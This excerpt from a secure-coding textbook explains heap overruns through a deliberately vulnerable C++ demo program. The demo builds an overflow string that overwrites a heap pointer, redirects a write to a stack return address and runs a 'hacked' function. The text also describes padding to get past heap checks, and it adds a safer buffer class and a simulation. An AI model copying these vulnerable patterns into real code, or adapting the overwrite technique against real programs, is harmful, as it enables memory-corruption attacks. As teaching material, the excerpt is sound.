Heap Overruns

A heap overrun is much the same problem as a static buffer overrun, but it is more difficult to exploit. As with a static buffer overrun, attackers can write arbitrary information into places in your application that they should not have access to. An excellent article on the subject is "w00w00 on Heap Overflows," written by Matt Conover of w00w00 Security Development (WSD). You can find this article at www.w00w00.org/files/articles/heaptut.txt.

The following application shows how a heap overrun can be exploited:

/*
  HeapOverrun.cpp
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
  Very flawed class to demonstrate a problem
*/

class BadStringBuf
{
public:
    BadStringBuf(void)
    {
        m_buf = NULL;
    }

    ~BadStringBuf(void)
    {
        if(m_buf != NULL)
            free(m_buf);
    }

    void Init(char* buf)
    {
        //Really bad code
        m_buf = buf;
    }

    void SetString(const char* input)
    {
        //This is stupid.
        strcpy(m_buf, input);
    }

    const char* GetString(void)
    {
        return m_buf;
    }

private:
    char* m_buf;
};

//Declare a pointer to the BadStringBuf class to hold our input.
BadStringBuf* g_pInput = NULL;

void bar(void)
{
    printf("You have been hacked!\n");
}

void BadFunc(const char* input1, const char* input2)
{
    //Someone said that heap overruns were not exploitable,
    //so allocate the buffer on the heap.

    char* buf = NULL;
    char* buf2;

    buf2 = (char*)malloc(16);
    g_pInput = new BadStringBuf;
    buf = (char*)malloc(16);
    //Bad programmer - no error checking on allocations

    g_pInput->Init(buf2);

    //The worst that can happen is a crash, right?
    strcpy(buf, input1);

    g_pInput->SetString(input2);

    printf("input 1 = %s\ninput2 = %s\n", buf, g_pInput->GetString());

    if(buf != NULL)
        free(buf);

}

int main(int argc, char* argv[])
{
    //Simulated argv strings
    char arg1[128];

    //This is the address of the bar function. 
    char arg2[4] = {0x0f, 0x10, 0x40, 0};    
    int offset = 0x40;  
                  
    //Using 0xfd is an evil trick to overcome heap corruption checking.
    //The 0xfd value at the end of the buffer checks for corruption.
    //No error checking here – it is just an example of how to 
    //construct an overflow string.
    memset(arg1, 0xfd, offset);
    arg1[offset]   = (char)0x94;
    arg1[offset+1] = (char)0xfe;
    arg1[offset+2] = (char)0x12;
    arg1[offset+3] = 0;
    arg1[offset+4] = 0;

    printf("Address of bar is %p\n", bar);
    BadFunc(arg1, arg2);

    if(g_pInput != NULL)
        delete g_pInput;

    return 0;
}

Looking at this sample, you can imagine that BadFunc was written by a programmer who was told that heap overruns were not exploitable. That programmer has also written BadStringBuf, a C++ class that holds the input buffer pointer. Its best feature is that it prevents memory leaks by freeing the buffer in the destructor. However, if the buffer passed to Init was not allocated with malloc, calling free on it in the destructor might cause problems.
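For contrast, here is a minimal sketch of how the class could avoid both flaws, assuming the caller is willing to state a capacity up front. SafeStringBuf and its members are hypothetical names that do not appear in the original sample. The class allocates its own buffer, so the destructor only ever frees memory that came from malloc, and SetString rejects input that does not fit.

```cpp
#include <cstddef>
#include <cstdlib>
#include <cstring>

// Hypothetical replacement for BadStringBuf (not part of the original sample).
// The class owns its allocation and remembers how large it is.
class SafeStringBuf
{
public:
    explicit SafeStringBuf(std::size_t capacity)
        : m_buf(NULL), m_capacity(0)
    {
        if (capacity == 0)
            return;
        m_buf = static_cast<char*>(std::malloc(capacity));
        if (m_buf != NULL)
        {
            m_capacity = capacity;
            m_buf[0] = '\0';
        }
    }

    ~SafeStringBuf()
    {
        // m_buf is either NULL or came from malloc; free(NULL) is a no-op.
        std::free(m_buf);
    }

    // Returns false and leaves the buffer unchanged if the input
    // (including its terminating null) does not fit.
    bool SetString(const char* input)
    {
        if (m_buf == NULL || input == NULL)
            return false;
        std::size_t len = std::strlen(input);
        if (len >= m_capacity)
            return false;
        std::memcpy(m_buf, input, len + 1);
        return true;
    }

    const char* GetString() const
    {
        return m_buf != NULL ? m_buf : "";
    }

private:
    // Declared but not defined, so the object cannot be copied and
    // two objects can never free the same buffer.
    SafeStringBuf(const SafeStringBuf&);
    SafeStringBuf& operator=(const SafeStringBuf&);

    char* m_buf;
    std::size_t m_capacity;
};
```

With a 16-byte capacity, SetString accepts a string of up to 15 characters and returns false for anything longer, so the caller must check the return value instead of assuming the copy succeeded.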

An attacker would notice that this application blows up when either the first or the second argument becomes too long. Also, the address of the error (indicated in the error message) shows that the memory corruption occurs up in the heap. The attacker then starts the program in a debugger and looks for the location of the first input string. What valuable memory could possibly adjoin this buffer? A little investigation reveals that the second argument is written into another dynamically allocated buffer, so where is the pointer to that buffer? Searching memory for the bytes that correspond to the address of the second buffer shows that the pointer is sitting just 0x40 bytes past the location where the first buffer starts. Now the attacker can change this pointer to anything at all, and any string passed as the second argument will be written to any point in the process space of the application!
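The adjacency described here can be modeled without touching a real heap. The following sketch is a simulation only: a flat byte array stands in for the heap, the 16-byte buffer starts at offset 0, and a 32-bit pointer value is stored 0x40 bytes later, as in the text. FakeHeap, StorePointer, LoadPointer, and UncheckedCopy are hypothetical names, and the real layout of a heap depends on the allocator and build settings.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>

// Simulated layout only; these constants mirror the numbers in the text.
const std::size_t kBufSize       = 16;    // size of the first buffer
const std::size_t kPointerOffset = 0x40;  // where the stored pointer sits
const std::size_t kArenaSize     = 128;   // size of the pretend heap

struct FakeHeap
{
    unsigned char bytes[kArenaSize];
};

// Store a 32-bit "pointer" value in the slot that follows the buffer.
void StorePointer(FakeHeap& heap, std::uint32_t value)
{
    std::memcpy(heap.bytes + kPointerOffset, &value, sizeof(value));
}

// Read the 32-bit "pointer" value back out of the slot.
std::uint32_t LoadPointer(const FakeHeap& heap)
{
    std::uint32_t value = 0;
    std::memcpy(&value, heap.bytes + kPointerOffset, sizeof(value));
    return value;
}

// Copies len bytes to the start of the buffer without comparing len to
// kBufSize, which is the flaw being modeled. The copy is clamped to the
// arena so that the sketch itself never writes out of bounds.
void UncheckedCopy(FakeHeap& heap, const unsigned char* src, std::size_t len)
{
    if (len > kArenaSize)
        len = kArenaSize;
    std::memcpy(heap.bytes, src, len);
}
```

Copying 16 bytes leaves the stored pointer alone. Copying 0x44 bytes, where the last four bytes hold a value chosen by the attacker, replaces the pointer with that value, which is the effect the attacker is looking for in the debugger.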

As in the first example, the attacker's goal is to get the bar function to execute, so the next step is to overwrite the pointer so that it references 0x0012fe94, which in this example happens to be the location on the stack where the return address for the BadFunc function is kept.
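The sample writes each address into its attack string one byte at a time, least significant byte first. That ordering assumes a 32-bit little-endian x86 target, which the 4-byte addresses in the sample suggest. A small sketch of the encoding follows; EncodeLittleEndian32 is a hypothetical helper, not part of the original program.

```cpp
#include <cstdint>

// Writes a 32-bit value into out[0..3], least significant byte first.
void EncodeLittleEndian32(std::uint32_t value, unsigned char out[4])
{
    for (int i = 0; i < 4; ++i)
        out[i] = static_cast<unsigned char>((value >> (8 * i)) & 0xffu);
}
```

Encoding 0x0012fe94 gives the bytes 0x94, 0xfe, 0x12, 0x00, which are the values the sample stores at arg1[offset] through arg1[offset+3]. Encoding 0x0040100f gives 0x0f, 0x10, 0x40, 0x00, which matches the initializer of arg2.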

The attacker tailors the second string to set the memory at 0x0012fe94 to the location of the bar function (0x0040100f). In this approach, the attacker does not smash the stack, so a mechanism that guards the stack will not notice that anything has changed. Stepping through the application, the attacker gets the following results:

Address of bar is 0040100F
input 1 = 2222222222222222222222222222222222222222222222222222ö??
input2 = *4@
You have been hacked!

Note that the attacker can run this code in debug mode and step through it because the Visual C++ debug mode stack checking does not apply to the heap.

Copyright © 2005 Microsoft Corporation.
All rights reserved.